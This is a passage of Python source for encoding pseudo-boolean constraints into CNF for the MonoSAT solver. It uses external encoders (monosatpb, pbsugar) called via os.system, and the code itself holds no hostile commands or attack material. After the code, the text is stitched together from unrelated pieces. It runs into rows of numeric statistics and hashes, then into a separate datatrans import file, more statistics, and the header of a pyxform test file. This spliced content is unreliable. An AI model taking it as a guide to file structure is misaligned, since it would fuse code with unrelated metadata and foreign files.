            self.AssertEqualPB(clause, lowerBound, weights)
        else:
            self.AssertGreaterEqPB(clause, lowerBound, weights)
            self.AssertLessEqPB(clause, upperBound, weights)

    def AssertPB(self, clause, val, constraint, weights=None):
        """Normalize and record a constraint.

        Constant literals are folded into ``val``; zero-weight terms are
        dropped; negative-polarity literals are rewritten using
        ``w*l == w - w*(not l)`` so every stored literal is positive.
        """
        if constraint == "!=" or constraint == "<>":
            self.AssertNotEqualPB(clause, val, weights)
            return
        nclause = []
        nweights = []
        for i, l in enumerate(clause):
            w = weights[i] if weights is not None else 1
            if w == 0:
                continue  # zero weight contributes nothing
            if l.isConstTrue():
                val -= w  # constant-true literal folds into the bound
                continue
            elif l.isConstFalse():
                continue  # constant-false literal contributes nothing
            if Monosat().isPositive(l.getLit()):
                nclause.append(l)
                nweights.append(w)
            else:
                # w*l == w - w*(not l): negate the literal, flip the weight,
                # and move the constant part into the bound.
                nclause.append(Not(l))
                nweights.append(-w)
                val -= w
        self.constraints.append((nclause, val, constraint, nweights))

    def _negate(self, constraint):
        """Return the complement operator; equality cannot be negated
        into a single opb operator and raises."""
        if constraint == "<":
            return ">="
        elif constraint == "<=":
            return ">"
        elif constraint == ">":
            return "<="
        elif constraint == ">=":
            return "<"
        elif constraint == "=":
            # '!=' is not directly supported in opb format; handled separately.
            raise Exception("Cannot negate equality")
        else:
            raise Exception("Unknown operator " + constraint)

    def AssertNotEqualPB(self, clause, value, weights=None):
        """Assert weighted sum != value (via a negated two-sided equality)."""
        Assert(Not(self.twoSidedPB(clause, value, "=", weights)))

    def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
        """Return a condition var true iff lowerBound <= weighted sum <= upperBound.

        Because opb has no inequality operator, when the condition is false
        an auxiliary choice variable selects whether the sum exceeds
        upperBound or falls below lowerBound.
        """
        if lowerBound == upperBound:
            return self.twoSidedPB(clause, lowerBound, "=", weights)
        elif lowerBound is None:
            return self.twoSidedPB(clause, upperBound, "<=", weights)
        elif upperBound is None:
            return self.twoSidedPB(clause, lowerBound, ">=", weights)
        condition = Var()
        self.conditionalRangePB(clause, lowerBound, upperBound, weights, condition)
        # If we are not within [lowerBound, upperBound], we must be outside it:
        # condition_g selects which side of the range is violated.
        condition_g = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            AssertImplies(And(Not(condition), condition_g), Equal(c, v))
        self.AssertPB(conditional_clause, upperBound, ">", weights)
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            AssertImplies(And(Not(condition), Not(condition_g)), Equal(c, v))
        self.AssertPB(conditional_clause, lowerBound, "<", weights)
        return condition

    def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
        """Return a condition var equivalent to the constraint holding."""
        if constraint == "!=" or constraint == "<>":
            return Not(self.twoSidedPB(clause, val, "=", weights, condition))
        if condition is None:
            condition = Var()
        nclause = list(clause)
        # Copy before padding so the caller's weight list is left untouched.
        weights = list(weights) if weights is not None else []
        while len(weights) < len(clause):
            weights.append(1)
        if constraint != "=":
            # A two-sided constraint is just two one-sided conditional constraints.
            self.conditionalPB(nclause, val, constraint, weights, condition)
            self.conditionalPB(
                nclause, val, self._negate(constraint), weights, Not(condition)
            )
        else:
            # Is there a more efficient way to build a two-sided equality
            # constraint out of one-sided constraints?
            self.conditionalPB(nclause, val, ">=", weights, condition)
            self.conditionalPB(nclause, val, "<=", weights, condition)
            self.conditionalPB(nclause, val, ">", weights, Not(condition))
            self.conditionalPB(nclause, val, "<", weights, Not(condition))
        return condition

    def conditionalPB_old(self, clause, val, constraint, weights=None, condition=None):
        """Legacy encoding kept for reference: copies the clause through
        implication-guarded fresh variables."""
        if condition is None:
            condition = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            Assert(Implies(condition, Equal(c, v)))
        self.AssertPB(conditional_clause, val, constraint, weights)
        return condition

    def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
        """Enforce the constraint only when the returned variable is true.

        Implemented by appending an internal condition literal whose weight
        is large enough to trivially satisfy the constraint whenever that
        literal is set.
        """
        if constraint == "!=" or constraint == "<>":
            v = Or(
                self.conditionalPB(clause, val, "<", weights),
                self.conditionalPB(clause, val, ">", weights),
            )
            if condition is not None:
                AssertEq(v, condition)
            return v
        if condition is None:
            condition = Var()
        else:
            # Work with the negation of the supplied condition internally.
            v = Var()
            AssertEq(v, Not(condition))
            condition = v
        # Copy before padding so the caller's weight list is left untouched.
        weights = list(weights) if weights is not None else []
        while len(weights) < len(clause):
            weights.append(1)
        # NOTE: the PB solver requires its variables to be input variables in
        # the circuit; conversion of non-input vars is currently disabled.
        nclause = list(clause)
        if (
            constraint == ">"
            or constraint == ">="
            or constraint == "="
            or constraint == "=="
        ):
            # Weight big enough that the condition literal alone satisfies
            # the >=-side regardless of all other (possibly negative) weights.
            negWeightSum = 0
            for w in weights:
                if w < 0:
                    negWeightSum += abs(w)
            total = negWeightSum + val
            if constraint == ">":
                total += 1
            nclause.append(condition)
            weights.append(total)
            if constraint == ">" or constraint == ">=":
                self.AssertPB(nclause, val, constraint, weights)
            else:
                self.AssertPB(nclause, val, ">=", weights)
            nclause.pop()
            weights.pop()
        if (
            constraint == "<"
            or constraint == "<="
            or constraint == "="
            or constraint == "=="
        ):
            posWeightSum = 0
            for w in weights:
                if w > 0:
                    posWeightSum += abs(w)
            total = posWeightSum + val
            if constraint == "<":
                total += 1
            nclause.append(condition)
            weights.append(-total)
            if constraint == "<" or constraint == "<=":
                self.AssertPB(nclause, val, constraint, weights)
            else:
                self.AssertPB(nclause, val, "<=", weights)
            nclause.pop()
            weights.pop()
        # The property is enforced when the internal condition var is false.
        return Not(condition)

    def conditionalRangePB(
        self, clause, lowerBound, upperBound, weights=None, condition=None
    ):
        """Enforce lowerBound <= weighted sum <= upperBound when ``condition`` holds."""
        if lowerBound == upperBound:
            return self.EqualPB(clause, lowerBound, weights, condition)
        elif lowerBound is None:
            return self.conditionalPB(clause, upperBound, "<=", weights, condition)
        elif upperBound is None:
            return self.conditionalPB(clause, lowerBound, ">=", weights, condition)
        if condition is None:
            condition = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            AssertImplies(condition, Equal(c, v))
        self.AssertPB(conditional_clause, lowerBound, ">=", weights)
        self.AssertPB(conditional_clause, upperBound, "<=", weights)
        return condition

    def LessThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<", weights, condition)

    def GreaterThanPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">", weights, condition)

    def LessEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "<=", weights, condition)

    def GreaterEqPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, ">=", weights, condition)

    def EqualPB(self, clause, val, weights=None, condition=None):
        return self.conditionalPB(clause, val, "=", weights, condition)

    def hasConstraints(self):
        return len(self.constraints) > 0

    def write(self):
        """Encode buffered constraints to CNF via the external 'monosatpb'
        binary, then import the resulting clauses into MonoSAT.

        Raises:
            RuntimeError: if the binary is missing or exits non-zero.
            TypeError: if a constraint bound is not an int.
        """
        if len(self.constraints) == 0:
            return
        tmpfile = NamedTemporaryFile(delete=False, suffix=".opb")
        tmpopb = tmpfile.name
        tmpfile.close()
        tmpfile = NamedTemporaryFile(delete=False, suffix=".cnf")
        tmpcnf = tmpfile.name
        tmpfile.close()
        # shutil.which exists on every supported Python 3 version, so the
        # old bare-except fallback to an undefined which() is gone.
        minisat_plus_path = shutil.which("monosatpb")
        if minisat_plus_path is None:
            raise RuntimeError(
                "In order to use PB constraints, monosatpb must be installed and on the path (see README).\n"
            )
        print(
            "Encoding pb constraints using %s using temporary files %s and %s "
            % (minisat_plus_path, tmpopb, tmpcnf)
        )
        # First pass: assign opb variable indices, validate bounds, and find
        # the longest constraint (affects encoder settings below).
        longest_constraint = 0
        invarmap = dict()  # dimacs literal -> opb variable index
        varmap = dict()    # opb/cnf variable index -> monosat literal
        nvars = 0
        for (clause, val, op, weights) in self.constraints:
            if not isinstance(val, int):
                raise TypeError(
                    "PB constraints weights must compare to integers, but found "
                    + str(type(val))
                )
            if len(clause) == 0:
                clause = [false()]
            if len(clause) > longest_constraint:
                longest_constraint = len(clause)
            for v in clause:
                l = dimacs(v.getLit())
                if l not in invarmap:
                    nvars += 1
                    invarmap[l] = nvars
                    varmap[nvars] = v.getLit()
        n_pbs = 0
        nvars += 1
        with open(tmpopb, "w") as fopb:
            fopb.write(
                "* #variable= "
                + str(nvars)
                + " #constraint= "
                + str(len(self.constraints))
                + "\n"
            )
            for (clause, val, op, weights) in self.constraints:
                if weights is None:
                    weights = []
                if len(clause) == 0:
                    clause = [false()]
                n_pbs += 1
                while len(weights) < len(clause):
                    weights.append(1)  # default weight
                for (v, w) in zip(clause, weights):
                    l = dimacs(v.getLit())
                    fopb.write(
                        ("+" if w >= 0 else "") + str(w) + " x" + str(invarmap[l]) + " "
                    )
                fopb.write(op + " " + str(val) + " ;\n")
        opts = ""
        if longest_constraint >= 5000:
            # Switch to the simple adder encoding for very large pb
            # constraints, or else minisat+ will be inordinately slow.
            opts = "-ca"
            print(
                "Note: using minisat+ %s encoding because largest pb constraint has %d > 5000 arguments"
                % (opts, longest_constraint)
            )
        # BUGFIX: the ulimit was previously issued as its own os.system()
        # call, which only affected that short-lived shell and NOT the
        # solver invocation.  Run both in one shell so minisat+ actually
        # gets the extra stack space (it crashes building BDDs otherwise).
        # -a turns off ansi codes, -s turns off sat-competition output,
        # -v0 sets verbosity to 0.
        status = os.system(
            "ulimit -s %d; %s %s -a -s -v0 -cnf=%s %s"
            % (32768 + longest_constraint, minisat_plus_path, opts, tmpcnf, tmpopb)
        )
        if status != 0:
            raise RuntimeError(
                "In order to use PB constraints, minisat+ (1.0) must be installed and on the path.\nEither it wasn't found, or it was but still returned an exit code of %d\n"
                % (status)
            )
        print("Importing %d pseudoboolean constraints into Monosat..." % (n_pbs))
        # BUGFIX: time.clock() was removed in Python 3.8; perf_counter()
        # is the documented replacement.
        t = time.perf_counter()
        Monosat().comment("pseudoboolean constraints")
        n_cls = 0
        with open(tmpcnf, "r") as convcnf:
            for line in convcnf:
                tokens = line.split()
                if line.startswith("p cnf") or line.startswith("c") or not tokens:
                    continue  # header, comment, or blank line
                n_cls += 1
                clause = list(map(int, tokens))
                assert len(clause) > 1
                assert clause[-1] == 0
                newclause = []
                for l in clause[:-1]:  # drop the trailing 0 terminator
                    v = abs(l)
                    if v not in varmap:
                        # Auxiliary variable introduced by the CNF encoder;
                        # give it a fresh monosat literal.
                        varmap[v] = Monosat().newLit()
                    newl = varmap[v]
                    if l < 0:
                        newl = Monosat().Not(newl)
                    newclause.append(newl)
                Monosat().addClause(newclause)
        Monosat().comment("end of pseudoboolean constraints")
        os.remove(tmpopb)
        os.remove(tmpcnf)
        PBManager().import_time += time.perf_counter() - t
        print("Imported pseudoboolean constraints into Monosat (%d clauses)" % (n_cls))
class PBSugar:
    """Pseudo-boolean (PB) constraint buffer that encodes constraints into
    OPB format and translates them to CNF with the external 'pbsugar' tool.

    Constraints are accumulated in memory as (clause, value, operator,
    weights) 4-tuples; nothing is encoded until write() is called.  The
    conditional variants return a literal that enforces the constraint when
    assigned the appropriate value.
    """

    def __init__(self):
        # Each entry is a (clause, val, operator, weights) 4-tuple; see AssertPB().
        self.constraints = []

    def clear(self):
        """Drop all buffered constraints."""
        self.constraints = []

    def hasConstraints(self):
        """Return True if at least one constraint has been buffered."""
        return len(self.constraints) > 0

    def AssertLessThanPB(self, clause, val, weights=None):
        """Assert weighted sum of clause < val."""
        self.AssertPB(clause, val, "<", weights)

    def AssertGreaterThanPB(self, clause, val, weights=None):
        """Assert weighted sum of clause > val."""
        self.AssertPB(clause, val, ">", weights)

    def AssertLessEqPB(self, clause, val, weights=None):
        """Assert weighted sum of clause <= val."""
        self.AssertPB(clause, val, "<=", weights)

    def AssertGreaterEqPB(self, clause, val, weights=None):
        """Assert weighted sum of clause >= val."""
        self.AssertPB(clause, val, ">=", weights)

    def AssertEqualPB(self, clause, val, weights=None):
        """Assert weighted sum of clause == val."""
        self.AssertPB(clause, val, "=", weights)

    def AssertRangePB(self, clause, lowerBound, upperBound, weights=None):
        """Assert lowerBound <= weighted sum <= upperBound (inclusive)."""
        if lowerBound == upperBound:
            self.AssertEqualPB(clause, lowerBound, weights)
        else:
            self.AssertGreaterEqPB(clause, lowerBound, weights)
            self.AssertLessEqPB(clause, upperBound, weights)

    def AssertPB(self, clause, val, constraint, weights=None):
        """Buffer the constraint (clause, val, constraint, weights).

        Both clause and weights are copied so that later mutation by the
        caller cannot corrupt the buffered constraint; a missing weights
        argument is stored as an empty list.
        """
        nclause = list(clause)
        self.constraints.append(
            (nclause, val, constraint, list(weights) if weights is not None else [])
        )

    def _negate(self, constraint):
        """Return the operator asserting the logical negation of 'constraint'.

        Raises for '=' because '!=' is not directly expressible in OPB
        format (it is handled separately by the callers), and for any
        unknown operator.
        """
        if constraint == "<":
            return ">="
        elif constraint == "<=":
            return ">"
        elif constraint == ">":
            return "<="
        elif constraint == ">=":
            return "<"
        elif constraint == "=":
            raise Exception("Cannot negate equality")
        else:
            raise Exception("Unknown operator " + constraint)

    def twoSidedRangePB(self, clause, lowerBound, upperBound, weights=None):
        """Return a condition literal equivalent to the weighted sum lying
        in [lowerBound, upperBound]; either bound may be None (one-sided).

        Because OPB cannot express a disjunction directly, the "outside the
        range" case is split with a fresh choice variable condition_g that
        selects which side (> upperBound or < lowerBound) is enforced.
        """
        if lowerBound == upperBound:
            return self.twoSidedPB(clause, lowerBound, "=", weights)
        elif lowerBound is None:
            return self.twoSidedPB(clause, upperBound, "<=", weights)
        elif upperBound is None:
            return self.twoSidedPB(clause, lowerBound, ">=", weights)
        condition = Var()
        self.conditionalRangePB(clause, lowerBound, upperBound, weights, condition)
        # If the condition that we are within the inclusive range
        # [lowerBound, upperBound] is false, we must be outside that range;
        # condition_g chooses which side of the range is violated.
        condition_g = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            Assert(Implies(And(Not(condition), condition_g), Equal(c, v)))
        self.AssertPB(conditional_clause, upperBound, ">", weights)
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            Assert(Implies(And(Not(condition), Not(condition_g)), Equal(c, v)))
        self.AssertPB(conditional_clause, lowerBound, "<", weights)
        return condition

    def twoSidedPB(self, clause, val, constraint, weights=None, condition=None):
        """Return a condition literal equivalent to (weighted sum 'constraint' val).

        If 'condition' is None a fresh Var() is created (the original
        behavior); passing an existing literal reuses it.  The optional
        parameter also makes this method compatible with the module-level
        twoSidedPB() wrapper, which forwards a 'condition' argument.
        """
        if condition is None:
            condition = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            Assert(Implies(condition, Equal(c, v)))
        self.AssertPB(conditional_clause, val, constraint, weights)
        if constraint != "=":
            conditional_clause = []
            for v in clause:
                c = Var()
                conditional_clause.append(c)
                Assert(Implies(Not(condition), Equal(c, v)))
            self.AssertPB(conditional_clause, val, self._negate(constraint), weights)
        else:
            # '!=' is not expressible in OPB, so when the condition is false
            # make yet another choice: a fresh variable condition_g selects
            # whether the '>' or the '<' side is enforced.
            condition_g = Var()
            conditional_clause = []
            for v in clause:
                c = Var()
                conditional_clause.append(c)
                Assert(Implies(And(Not(condition), condition_g), Equal(c, v)))
            self.AssertPB(conditional_clause, val, ">", weights)
            conditional_clause = []
            for v in clause:
                c = Var()
                conditional_clause.append(c)
                Assert(Implies(And(Not(condition), Not(condition_g)), Equal(c, v)))
            self.AssertPB(conditional_clause, val, "<", weights)
        return condition

    def conditionalPB_old(self, clause, val, constraint, weights=None, condition=None):
        """Legacy one-sided conditional constraint: enforce the constraint on
        aliased copies of the clause literals whenever 'condition' holds.
        Returns the condition literal (creating one if needed).
        """
        if condition is None:
            condition = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            Assert(Implies(condition, Equal(c, v)))
        self.AssertPB(conditional_clause, val, constraint, weights)
        return condition

    def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
        """Enforce (weighted sum 'constraint' val) whenever the returned
        literal is true, using the big-M trick: the condition literal is
        added to the constraint with a weight large enough to satisfy it
        trivially when the condition is false.

        Returns Not(condition): the property is enforced when that literal
        is true.
        """
        if condition is None:
            condition = Var()
        else:
            v = Var()
            AssertEq(v, Not(condition))
            condition = v
        # Work on a private copy: the original implementation padded the
        # caller's weights list in place, mutating a caller-owned argument.
        weights = [] if weights is None else list(weights)
        while len(weights) < len(clause):
            weights.append(1)  # default weight for unweighted literals
        nclause = []
        for v in clause:
            # For now, it is a limitation of the pb constraint solver that all
            # variables it deals with must be input variables in the circuit;
            # non-input vars would need to be aliased here if that changes.
            nclause.append(v)
        if constraint in (">", ">=", "=", "=="):
            # When the condition literal is true, its weight alone must be
            # able to satisfy the lower bound: the sum of negative weights
            # plus val (plus 1 for the strict '>').
            negWeightSum = 0
            for w in weights:
                if w < 0:
                    negWeightSum += abs(w)
            total = negWeightSum + val
            if constraint == ">":
                total += 1
            nclause.append(condition)
            weights.append(total)
            if constraint in (">", ">="):
                self.AssertPB(nclause, val, constraint, weights)
            else:
                self.AssertPB(nclause, val, ">=", weights)
            nclause.pop()
            weights.pop()
        if constraint in ("<", "<=", "=", "=="):
            # Symmetric big-M for the upper bound: negated weight large
            # enough to cancel the sum of all positive weights.
            posWeightSum = 0
            for w in weights:
                if w > 0:
                    posWeightSum += abs(w)
            total = posWeightSum + val
            if constraint == "<":
                total += 1
            nclause.append(condition)
            weights.append(-total)
            if constraint in ("<", "<="):
                self.AssertPB(nclause, val, constraint, weights)
            else:
                self.AssertPB(nclause, val, "<=", weights)
            nclause.pop()
            weights.pop()
        # The property is enforced if the condition variable is false.
        return Not(condition)

    def conditionalRangePB(
        self, clause, lowerBound, upperBound, weights=None, condition=None
    ):
        """Enforce lowerBound <= weighted sum <= upperBound whenever
        'condition' holds; either bound may be None for a one-sided
        constraint.  Returns the condition literal (creating one if needed).
        """
        if lowerBound == upperBound:
            return self.EqualPB(clause, lowerBound, weights, condition)
        elif lowerBound is None:
            return self.conditionalPB(clause, upperBound, "<=", weights, condition)
        elif upperBound is None:
            return self.conditionalPB(clause, lowerBound, ">=", weights, condition)
        if condition is None:
            condition = Var()
        conditional_clause = []
        for v in clause:
            c = Var()
            conditional_clause.append(c)
            Assert(Implies(condition, Equal(c, v)))
        self.AssertPB(conditional_clause, lowerBound, ">=", weights)
        self.AssertPB(conditional_clause, upperBound, "<=", weights)
        return condition

    def LessThanPB(self, clause, val, weights=None, condition=None):
        """Conditional weighted sum < val; see conditionalPB()."""
        return self.conditionalPB(clause, val, "<", weights, condition)

    def GreaterThanPB(self, clause, val, weights=None, condition=None):
        """Conditional weighted sum > val; see conditionalPB()."""
        return self.conditionalPB(clause, val, ">", weights, condition)

    def LessEqPB(self, clause, val, weights=None, condition=None):
        """Conditional weighted sum <= val; see conditionalPB()."""
        return self.conditionalPB(clause, val, "<=", weights, condition)

    def GreaterEqPB(self, clause, val, weights=None, condition=None):
        """Conditional weighted sum >= val; see conditionalPB()."""
        return self.conditionalPB(clause, val, ">=", weights, condition)

    def EqualPB(self, clause, val, weights=None, condition=None):
        """Conditional weighted sum == val; see conditionalPB()."""
        return self.conditionalPB(clause, val, "=", weights, condition)

    def write(self, cnf):
        """Encode all buffered constraints via the external pbsugar tool and
        append the resulting clauses to the DIMACS file 'cnf'.

        The constraints are written to convert.opb, translated by pbsugar
        into convert.cnf/convert.map, then remapped into a fresh variable
        namespace above the existing cnf's variables.

        NOTE: this encoder emits every literal with coefficient +1; the
        stored weights are currently ignored by the OPB writer.
        """
        if len(self.constraints) == 0:
            return
        print("Encoding pb constraints")
        nvars = 0
        # Fix: constraints are 4-tuples (clause, val, op, weights); the old
        # 3-way unpacking raised ValueError here.
        for (clause, val, op, weights) in self.constraints:
            for v in clause:
                if v.getInputLiteral() > nvars:
                    nvars = v.getInputLiteral()
        nvars += 1
        with open("convert.opb", "w") as fopb:
            fopb.write(
                "* #variable= "
                + str(nvars)
                + " #constraint= "
                + str(len(self.constraints))
                + "\n"
            )
            for (clause, val, op, weights) in self.constraints:
                for v in clause:
                    fopb.write("+1 x" + str(v.getInputLiteral()) + " ")
                fopb.write(op + " " + str(val) + " ;\n")
        os.system(
            "./pbsugar -map convert.map -n -sat convert.cnf -jar ./pbsugar-v1-1-1.jar "
            + "convert.opb"
        )
        varmap = dict()
        maxvarmap = 0
        with open("convert.map", "r") as fmap:
            fmap.readline()  # first line is the mapping count; not needed here
            for line in fmap.readlines():
                parts = line.split()
                invar = int(parts[0][1:])  # strip the leading 'x'
                outvar = int(parts[1])
                varmap[invar] = outvar
                maxvarmap = max(maxvarmap, outvar)
        # Find the largest var in the cnf, so we can cleanly place the pb cnf
        # in its own namespace above it.
        num_vars = 0
        with open(cnf, "r") as fcnf:
            for line in fcnf.readlines():
                if line.startswith("p cnf"):  # header
                    header = line.split()
                    num_vars = int(header[2])
        num_vars = max(num_vars, maxvarmap)
        nextVar = num_vars + 1
        # Append the remapped converted clauses (also closes convcnf, which
        # the original implementation leaked).
        with open(cnf, "a") as fcnf, open("convert.cnf", "r") as convcnf:
            fcnf.write("c pseudoboolean constraints:\n")
            for line in convcnf.readlines():
                if line.startswith("p cnf"):  # header of the converted cnf
                    pass
                elif line.startswith("c"):  # comment line
                    pass
                elif len(line.split()) == 0:  # blank line
                    pass
                else:
                    clause = list(map(int, line.split()))
                    assert len(clause) > 1
                    assert clause[-1] == 0
                    for l in clause:
                        if l == 0:
                            continue
                        v = abs(l)
                        if v not in varmap:
                            varmap[v] = nextVar
                            nextVar += 1
                        v = varmap[v]
                        if l < 0:
                            v = -v
                        fcnf.write(str(v) + " ")
                    fcnf.write("0\n")
            fcnf.write("c end of pseudoboolean constraints\n")
def AssertLessThanPB(clause, val, weights=None):
    """Assert weighted sum of clause < val on the global PB manager."""
    manager = PBManager()
    manager.AssertPB(clause, val, "<", weights)


def AssertGreaterThanPB(clause, val, weights=None):
    """Assert weighted sum of clause > val on the global PB manager."""
    manager = PBManager()
    manager.AssertPB(clause, val, ">", weights)


def AssertLessEqPB(clause, val, weights=None):
    """Assert weighted sum of clause <= val on the global PB manager."""
    manager = PBManager()
    manager.AssertPB(clause, val, "<=", weights)


def AssertGreaterEqPB(clause, val, weights=None):
    """Assert weighted sum of clause >= val on the global PB manager."""
    manager = PBManager()
    manager.AssertPB(clause, val, ">=", weights)


def AssertEqualPB(clause, val, weights=None):
    """Assert weighted sum of clause == val on the global PB manager."""
    manager = PBManager()
    manager.AssertPB(clause, val, "=", weights)


def AssertNotEqualPB(clause, val, weights=None):
    """Assert weighted sum of clause != val on the global PB manager."""
    manager = PBManager()
    manager.AssertPB(clause, val, "!=", weights)


def AssertRangePB(clause, lowerBound, upperBound, weights=None):
    """Assert lowerBound <= weighted sum <= upperBound (inclusive)."""
    manager = PBManager()
    manager.pb.AssertRangePB(clause, lowerBound, upperBound, weights)


def AssertPB(clause, val, constraint, weights=None):
    """Assert an arbitrary pseudo-boolean constraint on the global manager."""
    manager = PBManager()
    manager.pb.AssertPB(clause, val, constraint, weights)


def twoSidedRangePB(clause, lowerBound, upperBound, weights=None):
    """Return a literal equivalent to the weighted sum lying in the range."""
    manager = PBManager()
    return manager.pb.twoSidedRangePB(clause, lowerBound, upperBound, weights)


def twoSidedPB(clause, val, constraint, weights=None, condition=None):
    """Return a literal equivalent to (weighted sum 'constraint' val)."""
    manager = PBManager()
    return manager.pb.twoSidedPB(clause, val, constraint, weights, condition)


def conditionalPB(clause, val, constraint, weights=None, condition=None):
    """Enforce the constraint whenever the returned literal holds."""
    manager = PBManager()
    return manager.pb.conditionalPB(clause, val, constraint, weights, condition)


def conditionalRangePB(clause, lowerBound, upperBound, weights=None, condition=None):
    """Enforce the range constraint whenever the returned literal holds."""
    manager = PBManager()
    return manager.pb.conditionalRangePB(
        clause, lowerBound, upperBound, weights, condition
    )


def LessThanPB(clause, val, weights=None, condition=None):
    """Conditional weighted sum < val; see conditionalPB()."""
    manager = PBManager()
    return manager.conditionalPB(clause, val, "<", weights, condition)


def GreaterThanPB(clause, val, weights=None, condition=None):
    """Conditional weighted sum > val; see conditionalPB()."""
    manager = PBManager()
    return manager.conditionalPB(clause, val, ">", weights, condition)


def LessEqPB(clause, val, weights=None, condition=None):
    """Conditional weighted sum <= val; see conditionalPB()."""
    manager = PBManager()
    return manager.conditionalPB(clause, val, "<=", weights, condition)


def GreaterEqPB(clause, val, weights=None, condition=None):
    """Conditional weighted sum >= val; see conditionalPB()."""
    manager = PBManager()
    return manager.conditionalPB(clause, val, ">=", weights, condition)


def EqualPB(clause, val, weights=None, condition=None):
    """Conditional weighted sum == val; see conditionalPB()."""
    manager = PBManager()
    return manager.conditionalPB(clause, val, "=", weights, condition)


def AssertExactlyOne(clause):
    """Assert that exactly one literal of the clause is true."""
    manager = PBManager()
    manager.AssertExactlyOne(clause)


def AssertAtMostOne(clause):
    """Assert that at most one literal of the clause is true."""
    manager = PBManager()
    manager.AssertAtMostOne(clause)
# shutil.which, backported from the python 3.3 sources, if python version < 3.3
# The 'which' function included here falls under Python's PSF
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
    """Given a command, mode, and a PATH string, return the path which
    conforms to the given mode on the PATH, or None if there is no such
    file.

    `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
    of os.environ.get("PATH"), or can be overridden with a custom search
    path.
    """

    # A candidate is usable when it exists, is accessible with the requested
    # mode, and is not a directory (directories pass os.access on Windows).
    def _usable(candidate, access_mode):
        return (
            os.path.exists(candidate)
            and os.access(candidate, access_mode)
            and not os.path.isdir(candidate)
        )

    # Short circuit: a full path that already satisfies the mode wins.
    if _usable(cmd, mode):
        return cmd

    search_dirs = (path or os.environ.get("PATH", os.defpath)).split(os.pathsep)

    if sys.platform == "win32":
        # The current directory takes precedence on Windows.
        if os.curdir not in search_dirs:
            search_dirs.insert(0, os.curdir)
        # PATHEXT lists the executable suffixes to try on Windows.
        pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
        # If cmd already carries one of those suffixes (e.g. "python.exe"),
        # test only it; otherwise try each suffix in turn.
        if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
            candidates = [cmd]
        else:
            candidates = [cmd + ext.lower() for ext in pathext]
    else:
        # Other platforms have no PATHEXT equivalent; test cmd as-is.
        candidates = [cmd]

    visited = set()
    for directory in search_dirs:
        directory = os.path.normcase(directory)
        if directory in visited:
            continue
        visited.add(directory)
        for candidate in candidates:
            full_path = os.path.join(directory, candidate)
            if _usable(full_path, mode):
                return full_path
    return None
| 36.586675
| 174
| 0.56592
| 6,149
| 59,307
| 5.428362
| 0.084404
| 0.058779
| 0.075257
| 0.037149
| 0.807963
| 0.796459
| 0.783157
| 0.777794
| 0.759579
| 0.742113
| 0
| 0.003848
| 0.32089
| 59,307
| 1,620
| 175
| 36.609259
| 0.824908
| 0.162207
| 0
| 0.733032
| 0
| 0.00181
| 0.031738
| 0
| 0
| 0
| 0
| 0
| 0.152941
| 1
| 0.122172
| false
| 0.006335
| 0.011765
| 0.039819
| 0.238914
| 0.004525
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e810e506556a302cd54508a74967600b9d95880e
| 419
|
py
|
Python
|
datatrans/structured_data/__init__.py
|
KooCook/datatrans
|
65c80da4d8a1ed67963b9d704b361c864cb1151b
|
[
"BSD-3-Clause"
] | 1
|
2020-10-24T04:07:42.000Z
|
2020-10-24T04:07:42.000Z
|
datatrans/structured_data/__init__.py
|
KooCook/datatrans
|
65c80da4d8a1ed67963b9d704b361c864cb1151b
|
[
"BSD-3-Clause"
] | null | null | null |
datatrans/structured_data/__init__.py
|
KooCook/datatrans
|
65c80da4d8a1ed67963b9d704b361c864cb1151b
|
[
"BSD-3-Clause"
] | null | null | null |
from datatrans.structured_data.base import *
from datatrans.structured_data.carousel import ItemList, ItemListOrderType, ListItem
from datatrans.structured_data.lower import *
from datatrans.structured_data.person import Person
from datatrans.structured_data.recipe import NutritionInformation, Recipe
from datatrans.structured_data.review import AggregateRating
from datatrans.structured_data.video import VideoObject
| 52.375
| 84
| 0.880668
| 50
| 419
| 7.24
| 0.36
| 0.251381
| 0.444751
| 0.522099
| 0.18232
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073986
| 419
| 7
| 85
| 59.857143
| 0.93299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c48dfb24d4b32da11dc3b82cac98790cf672df3
| 10,254
|
py
|
Python
|
pyxform/tests_v1/test_randomize_itemsets.py
|
PMA-2020/pmaxform3
|
9d36f97f25cb09f0fb8aafb69370454731ecbbd5
|
[
"BSD-2-Clause"
] | 1
|
2020-10-19T15:37:36.000Z
|
2020-10-19T15:37:36.000Z
|
